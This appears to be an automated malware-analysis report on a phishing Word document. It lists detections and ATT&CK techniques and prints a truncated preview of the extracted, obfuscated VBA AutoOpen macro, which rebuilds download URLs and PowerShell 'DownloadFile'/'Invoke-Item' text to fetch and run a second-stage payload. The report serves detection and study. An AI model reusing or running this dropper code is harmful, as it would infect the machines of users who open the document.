Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The critical heuristic 'OLE_VBA_SHELL' and the presence of VBA macros, specifically an 'AutoOpen' macro, indicate that the document is designed to execute code upon opening. The VBA script reconstructs a URL, 'http://argzS+eUY+eUYdiamugzeUY+eUYS++gzSlgzS+g+zStgzS+gzSikgzS+gzSagzS+gzSryagzS+gzS.com/V8gzS+gzS8bseUY+eUYkk/', which is likely used to download and execute a second-stage payload. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature as a dropper for phishing lures.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://argzS+eUY+e (display truncated) - in document text (OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main - in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 77961 bytes |

SHA-256 (macros.bas): 0d97e7b982d74230ad9f44834d85baf2d2522aa90ca7a5fc9222342d371f3bed
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jXzUmqFmYFoK"
Function KwsScYOlpDsv()
On Error Resume Next
MbdjwiE = (NEmiuBWnP - Rnd(43 * Tan(ikXUlKKwH)) / YZDTOjkmV * Oct(PDVJTPhm) * AYMIXNWajO / Oct(MOwiuoBT - Chr(250) + 581 - ChrB(LRjSICiPO)) - 389 + WcXZHoM)
CKJbclOhwB = (jpukbFUNUqS - Rnd(43 * Tan(SvoEaPilEz)) / HwziMzr * Oct(zCAbnJas) * pzABGibRIIYws / Oct(VhmnndbHN - Chr(250) + 581 - ChrB(jUURTBuzXov)) - 389 + wBASWMDr)
ArzfscqDqjR = Mid("jbzsPRWY9N9OHY2wzsCfV'tp:/gzS+gzS'+'/meeUY+eUYdiamugzeUY+eUYS'+'+gzSlgzS+g'+'zStgzS+gzSikgzS+gzSagzS+gzSryagzS+gzS.com/V8gzS+gzS8bseUY+eUYkk/,http://argzS+eUY+e'+'UYgzStean'+'dinopegzSehitIliiiJhvD7lo", 22, 164)
OpNXwt = (jGsIDXMuB - Rnd(43 * Tan(rPiOOWOi)) / tzUjHMfsfoooq * Oct(XVNXCOMFNBXY) * XHNALYzSQLWlwY / Oct(jFMSBhGtBzM - Chr(250) + 581 - ChrB(domTMjNHlS)) - 389 + dQqPGJqlFqhYH)
XRGdj = (btFAmluWbEcsiA - Rnd(43 * Tan(BLBLXQrMV)) / GVSJMpzq * Oct(wcDdSFvLzNCmC) * pDbWuch / Oct(hjtfPcMOOiCu - Chr(250) + 581 - ChrB(pwijFbF)) - 389 + wSVEScFkTDOHOv)
OYYJXJfq = (EXQQNMAzEWiir - Rnd(43 * Tan(CjQtORiC)) / SAjLOGiv * Oct(iiHMwrXGn) * LUlbRfjVZoK / Oct(GCMwQiAmsaaOA - Chr(250) + 581 - ChrB(DqmZVIiEq)) - 389 + hYSfilEHFnYFz)
aLBsrs = Mid("i868[sTrING][ChAr]39) | . ((geT-VAriable '*mDR*').Name[3,11,2]-jOiN'')EBm58fSv43GjhssHGG", 5, 66)
azLDjQZ = (kmpTwiwYj - Rnd(43 * Tan(AzFtmoAb)) / jRXazzHdvbnmn * Oct(fwzPIHMzulwRcA) * jPNfaMBMMsTrE / Oct(wwVNFav - Chr(250) + 581 - ChrB(YrUcjXlifWGmP)) - 389 + ZHNidlkX)
wQMrwK = (zBqLZfiNdpXwCE - Rnd(43 * Tan(ikpkRvfXZtaN)) / wzwSkjllwIhwK * Oct(BqNzCWilibBzB) * dRRzSmQdsF / Oct(VSAfcImHE - Chr(250) + 581 - ChrB(hLuXqOLRUQl)) - 389 + RHhrijXaXzH)
JCmojii = (PHwzpbEXavrrW - Rnd(43 * Tan(wcibhMzk)) / nkWNAWwKE * Oct(CEUnZwC) * zjqYUDwOGzK / Oct(KrfpIMS - Chr(250) + 581 - ChrB(DAdlmpTGd)) - 389 + EiflzEbPQSRlQ)
FGoaiz = Mid("ZwSOivIdIZY+eUYngzS+gzSloadgzS+gzSFilegzS+gzS(IgzS+gzSvragzS+gzSbc.ToStrigzS+geUY+eUYzSngzS+gzSg(gzS+gzS),gzS+gzS IgzS+gzS'+'v'+'rhugzS+gzSas);Invoke-ItegzS+gzSm(5ljEvwECYC8h2zPmbT0", 11, 152)
zMwIAzwnpY = (hEiFFTPszpwF - Rnd(43 * Tan(bbXFMYocqB)) / wlaFjiHkEHqmk * Oct(LABthcK) * UGEzVLYSKqC / Oct(GUtJISiMBPkp - Chr(250) + 581 - ChrB(wAXniIZiXRTBj)) - 389 + wLmzAjzz)
lHfErnm = (oXmlYLizPjZXu - Rnd(43 * Tan(GcfzGOJjGGE)) / UHipjDYpwbhzSP * Oct(CGRRjAluQCYav) * FQfhirXUZDW / Oct(EjfufiqYGcppUt - Chr(250) + 581 - ChrB(NOmIccKtLCRo)) - 389 + ThjNulvEOW)
qQpYhVMd = (HskOtwaFWOMWK - Rnd(43 * Tan(ibhdDiD)) / IZJmBORkGo * Oct(JPvwufjzMzmXml) * HWSFvQoi / Oct(LFHzLnlIXXBk - Chr(250) + 581 - ChrB(cnwTlqbVCWAq)) - 389 + uRAsiVhK)
UCqTz = Mid("K05rKJpXA2zU8bHzz1rpbij9RNVQn'PgzS'+'+gzSFNo/,http:geUY+eU'+'YzS+gzS//gzS+gzSwgzS+gzSwwgzS+gzS.dgzS+gzSrgz'+'S+geUY+eUYzSmkeUY+eUYagzS+gzS.ir/PeUY+eUY60u/gzS+gzS,ht'+1RTDVAoIq", 30, 137)
oAaJWbX = (tjXXdapNlI - Rnd(43 * Tan(GnutVtnU)) / NqSFYvbujwdws * Oct(OsFnQkMEC) * IatSBPBRu / Oct(JDRSwiwuinf - Chr(250) + 581 - ChrB(OXjAQGXj)) - 389 + JnDwwBJtTwM)
DEwfVFDAwH = (TIqnBPj - Rnd(43 * Tan(aLLinBzW)) / BKZcFRwZMffqCS * Oct(YAdHXlPZcrqPLz) * LntutLpYN / Oct(rOpjDVXtPGmYp - Chr(250) + 581 - ChrB(MmkzlOBnctTszH)) - 389 + jjcPQfXZqY)
FGzHLWWQTc = (OFLbnoi - Rnd(43 * Tan(RZPkzMVmAzuu)) / wzQOVAjp * Oct(LqTHASV) * cSozNkXSzl / Oct(WsUCRsQFvNR - Chr(250) + 581 - ChrB(BwQOZRpMDRbWc)) - 389 + NkPsvWP)
tCujVKP = Mid("FjpYvPjNkYa'+'vgzS+gzS:publicgzS+g'+'z'+'S gzS+gzS+gzS+gzS qeUY+eUYkgaR1'+'geUY+eUYzS+gzSqgzS+gzSkg + gz'+'S+gzSeUY+eUYIvgzS+gzSr'+'karapgzS+gzSasgzS+gjzlZqaN0XK5", 12, 140)
FHYQpzYnsJY = (TWvrfnwuiG - Rnd(43 * Tan(snzqElvPLYP)) / fWJJYSoMtY * Oct(virkOjuCZ) * IqpQZblia / Oct(wDBQUViZc - Chr(250) + 581 - ChrB(uhTXDLMBhjQWqC)) - 389 + jUszqCiTKT)
VQqCF = (YRlvodFw - Rnd(43 * Tan(cQNNfHmvs)) / GiNlYSBX * Oct(aoLvzWcEKjJ) * jKGwVhwzzQO / Oct(DucLjMc - Chr(250) + 581 - ChrB(GiYiRVNqCDbM)) - 389 + jXUGnDkDXdJa)
wHoTAwud = (dbPsC
... (truncated)